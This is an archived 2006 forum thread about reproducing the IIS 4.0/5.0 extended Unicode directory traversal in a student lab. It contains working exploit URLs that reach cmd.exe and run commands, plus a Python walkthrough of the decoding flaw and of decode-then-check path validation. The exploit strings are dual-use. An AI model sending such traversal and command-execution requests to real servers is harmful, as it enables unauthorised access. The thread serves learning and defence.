Title: pentest: IIS 4.0 directory traversal ERROR 500
Post by: paddy on August 18, 2006, 04:07:24 AM

My classmates and I are simulating a directory traversal attack on an NT box we set up in our lab with IIS 4.0.

The problem is, when entering the actual directory traversal strings in the browser, we get a 500 Internal Server Error. Example strings are as follows:

http://testserverIP/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
http://testserverIP/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe

Since we know that the path exists and that cmd.exe exists, could anyone give me an idea as to what is possibly preventing us from successfully recreating the said exploit? Any help would be much appreciated. Thanks. :)

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: jimbob on August 18, 2006, 04:11:20 AM

Hi,

I don't really know IIS all that well, so I'm going to be a little facetious. Have you read the logs? There ought to be an error message explaining the HTTP 500 status code. Are you sure your version of IIS is vulnerable to that particular attack? Are you sure the attack has not succeeded?

Regards,
Jim

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: dean on August 18, 2006, 08:35:48 AM

Hi Paddy,

Have a look at the following. It covers the IIS Extended Unicode Directory Traversal Vulnerability.

http://www.securityfocus.com/bid/1806/exploit

Your paths & Unicode encoding look correct, but you have not told cmd.exe what command to run. Append this to your URLs:

/cmd.exe?/c+ipconfig

HTH,
Dean

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: paddy on August 18, 2006, 11:04:16 PM

Thanks guys.

Hmmm... it seems that our testbox was vulnerable to only certain extended Unicode combinations (like %c1%1c and %c1%9c, for example). Anyone have any ideas why? I will also look further into this.

BTW, I used the ever popular "cmd.exe?/c+dir" thing... just neglected to include it in the previous post. (Sorry 'bout that, Dean.) :)

In the meantime, we're still tinkering with the testbox. Thanks again, guys! ;D

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: LSOChris on August 19, 2006, 01:32:47 PM

Probably because it's Windows NT; a 2k box should be vulnerable to more combinations of the Unicode attack.

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: dean on August 19, 2006, 01:42:39 PM

Hi Paddy,

%c1%1c is the Chinese representation of '\' in Unicode. %c1%9c is the English representation of '\'. So your IIS server (English, I assume) :) should only be vulnerable to the English version. %c0%af should also work on your server.

Tested the following on a Win2k server test box I have:

Successful:
http://ipaddr/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://ipaddr/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\

Failed:
http://ipaddr/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

Also, make sure that the directory (e.g. /scripts/) is marked as executable, otherwise the attack will fail.

Cheers,
Dean

Title: Re: pentest: IIS 4.0 directory traversal ERROR 500
Post by: paddy on August 21, 2006, 10:27:13 PM

Roger that. ;)

Thanks again, guys! BTW, we're having fun tinkering with the box.
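The three byte sequences the thread goes back and forth about can be worked through arithmetically rather than by language. The Python below is an added example, not code from the thread and not IIS's decoder: it models a permissive UTF-8 decoder that accepts the overlong two-byte forms (lead bytes C0/C1) and never validates the second byte, which is exactly what makes %c0%af become '/' and both %c1%9c and %c1%1c become '\' (9C and 1C share the same low six bits; 1C simply is not a legal continuation byte, so a decoder that does check continuation bytes treats it differently, which matches the differing results Paddy and Dean saw). It then contrasts the ordering that made the bug possible, running the ".." check on the still-encoded path and decoding afterwards, with decode-then-check plus a web-root containment test. The `inetpub/wwwroot` layout, the lenient-decoder behaviour and the check ordering are modelling assumptions, flagged in the comments; the request path is Paddy's first URL with the `?/c+dir` he mentions appended.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# Assumed physical web root (drive letter omitted); not taken from the thread.
WEBROOT = ["inetpub", "wwwroot"]

# Paddy's first request path from the thread, plus the "?/c+dir" he said he used.
ATTACK = "/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir"


def lenient_utf8_decode(data: bytes) -> str:
    """Model of a permissive decoder (an assumption, not the real IIS code):
    accepts overlong two-byte forms with lead bytes C0/C1 and never checks that
    the second byte is a continuation byte (0x80..0xBF); it just keeps its low
    six bits.  So C0 AF -> 0x2F '/', C1 9C -> 0x5C '\\', and the malformed
    C1 1C -> 0x5C '\\' as well (0x9C and 0x1C agree in their low six bits)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def strict_utf8_decode(data: bytes) -> str | None:
    """A conforming decoder: C0/C1 can only start overlong forms and 0x1C is
    not a continuation byte, so all three sequences are rejected (None)."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_both(pct: str) -> tuple[str, str | None]:
    """(lenient, strict) result for one percent-encoded byte sequence."""
    raw = unquote_to_bytes(pct)
    return lenient_utf8_decode(raw), strict_utf8_decode(raw)


def split_segments(path: str) -> list[str]:
    """Drop the query string, split on either separator, drop '' and '.' parts."""
    path = path.split("?", 1)[0]
    return [s for s in re.split(r"[\\/]+", path) if s not in ("", ".")]


def normalize(segments: list[str]) -> tuple[list[str], bool]:
    """Collapse '..' parts; the flag reports an attempt to climb above the root."""
    out: list[str] = []
    escaped = False
    for s in segments:
        if s == "..":
            if out:
                out.pop()
            else:
                escaped = True
        else:
            out.append(s)
    return out, escaped


def resolve_check_then_decode(url_path: str) -> str | None:
    """Vulnerable ordering (models the bug the thread exercises): the '..'
    check runs on the still-encoded path, where '..%c0%af..' is one opaque
    segment; only afterwards is each segment decoded and mapped to disk."""
    virtual, escaped = normalize(split_segments(url_path))
    if escaped:                      # a literal /../ above the site root is caught
        return None
    decoded = "/".join(lenient_utf8_decode(unquote_to_bytes(s)) for s in virtual)
    physical, _ = normalize(WEBROOT + split_segments(decoded))   # no check here
    return "/".join(physical)


def resolve_decode_then_check(url_path: str, decoder=strict_utf8_decode) -> str | None:
    """Fixed ordering: decode everything first, normalize, then require the
    result to still sit under WEBROOT.  With the strict decoder the request
    dies at step one; even with the lenient decoder, containment rejects it."""
    text = decoder(unquote_to_bytes(url_path))
    if text is None:
        return None
    physical, escaped = normalize(WEBROOT + split_segments(text))
    if escaped or physical[: len(WEBROOT)] != WEBROOT:
        return None
    return "/".join(physical)


if __name__ == "__main__":
    for seq in ("%c0%af", "%c1%9c", "%c1%1c"):
        print(seq, decode_both(seq))
    print("vulnerable ->", resolve_check_then_decode(ATTACK))
    print("fixed      ->", resolve_decode_then_check(ATTACK))
```

Running it shows the vulnerable ordering mapping Paddy's request to `winnt/system32/cmd.exe` (the three `..%c0%af..` segments over-climb and clamp at the drive root), while the decode-then-check version returns None for the same request whichever decoder it is given. The same lenient decoder is also what a log-review script should use when hunting for these requests in old IIS logs: decoding with a strict UTF-8 decoder will throw on exactly the lines you are looking for.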